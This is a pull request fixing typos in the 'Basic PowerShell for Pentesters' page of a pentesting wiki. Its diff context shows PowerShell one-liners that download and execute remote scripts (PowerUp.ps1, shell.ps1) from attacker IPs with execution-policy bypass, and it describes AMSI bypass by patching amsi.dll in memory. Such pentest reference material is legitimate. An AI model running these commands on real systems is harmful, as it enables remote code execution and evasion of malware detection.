### PR TITLE
Fix typos in `Basic PowerShell for Pentesters`

### DIFF
--- a/src/windows-hardening/basic-powershell-for-pentesters/README.md
+++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md
@@ -23,7 +23,6 @@ Get-Command -Module <modulename>
 ## Download & Execute
 
 ```powershell
-g
 echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
 powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
 iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3

--- a/src/windows-hardening/basic-powershell-for-pentesters/README.md
+++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md
@@ -141,7 +141,7 @@ ValueData : 0
 
 **`amsi.dll`** is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**. Making it not detect anything.
 
-Therefore, the goal of the AMSI bypasses you will are to **overwrite the instructions of that DLL in memory to make the detection useless**.
+Therefore, the goal of the AMSI bypasses you will use is to **overwrite the instructions of that DLL in memory to make the detection useless**.
 
 **AMSI bypass generator** web page: [**https://amsi.fail/**](https://amsi.fail/)
 
@@ -465,6 +465,3 @@ RawDescriptor    : System.Security.AccessControl.CommonSecurityDescriptor
 ```
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-


### PR DESCRIPTION
From: https://github.com/HackTricks-wiki/hacktricks/pull/973

- Fixes `g` typo introduced in `2d9f506e60`.
- Corrects a grammatical error `you will are to` with `you will use is to`.